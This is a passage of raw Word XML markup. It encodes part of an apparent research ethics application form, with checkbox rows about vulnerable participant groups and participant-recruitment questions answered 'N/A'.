          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="34" w:type="dxa"/>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="02E2618D" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8217" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="41C519A4" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Children and Young People under the age of 18? (Consent from Parent, Carer or Guardian will be required)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-375472827"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="417583FE"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22" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="1887361462"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="545588D4"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04C4EE08" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="34" w:type="dxa"/>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7140F061" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8217" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6352AE0D" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Prisoners?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="1692793907"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="75EC0974"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22" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="326411418"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="7B339415"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44265553" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="34" w:type="dxa"/>
          <w:trHeight w:val="439"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="11EC5AE3" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8217" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="33676FDC" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Young offenders?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="1255410168"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="223B2A02"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22" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-1236000582"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="52C75575"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0BEBA706" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="34" w:type="dxa"/>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="0DA4399B" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8217" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7042AAB9" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Those who could be considered to have a particularly dependent relationship with the investigator or a gatekeeper?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-1016453075"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="489C7CFC"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22" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="1673070048"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="36739A1A"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46A4E38E" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="34" w:type="dxa"/>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="6A7340E8" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8217" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="628DF92B" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>People engaged in illegal activities?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-1519850840"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="7B9CCE3E"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22" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="1072859745"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="49A128BE"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19F809BF" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="34" w:type="dxa"/>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="3EBA92F5" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8217" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16A488B7" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Others (please identify specifically any group who may be unable to give consent) please indicate here and tick the appropriate box.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="411D8170" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-1984918035"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="23FB7EEE"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22" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-1870052561"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="024130C1"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21B9F83A" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="34" w:type="dxa"/>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B9AAF9E" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8217" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="585018F6" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Other – please indicate here:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13DA8A09" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="41EE27A1" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="822" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="68731358" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="72987A4C" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="34" w:type="dxa"/>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="76749A11" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9889" w:type="dxa"/>
            <w:gridSpan w:val="7"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="72476593" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Participant numbers and source</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3810ABB8" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t xml:space="preserve">Provide an estimate of the expected number of participants. How will you identify participants and how will they be recruited? </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00663E33" w:rsidRPr="00E42F41" w14:paraId="3CA6736A" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="34" w:type="dxa"/>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cPr>
          <w:p w14:paraId="5E98A840" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>13</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217B75CB" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>How many participants are expected?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1862BEB8" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6633" w:type="dxa"/>
            <w:gridSpan w:val="6"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1F3B67BF" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4507C821" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5695673D" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00663E33" w:rsidRPr="00E42F41" w14:paraId="6F80AEB7" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="34" w:type="dxa"/>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cPr>
          <w:p w14:paraId="58A684B2" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>14</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073D7CAE" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Who will the participants be?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CE4D4C9" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6633" w:type="dxa"/>
            <w:gridSpan w:val="6"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="51C3F7FD" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="660D7DFF" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EA79EB7" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:i/>
                <w:color w:val="808080"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00663E33" w:rsidRPr="00E42F41" w14:paraId="69DA2FEF" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="34" w:type="dxa"/>
          <w:trHeight w:val="403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="36BB9353" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3256" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="550F9FE8" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>How will you identify the participants?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6633" w:type="dxa"/>
            <w:gridSpan w:val="6"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="53766F6E" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="019DBB3D" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B24B255" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="808080"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="28944C6B" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="562" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="726DCCFC" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7088" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="795DC9F1" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Information for participants:</w:t>
            </w:r>
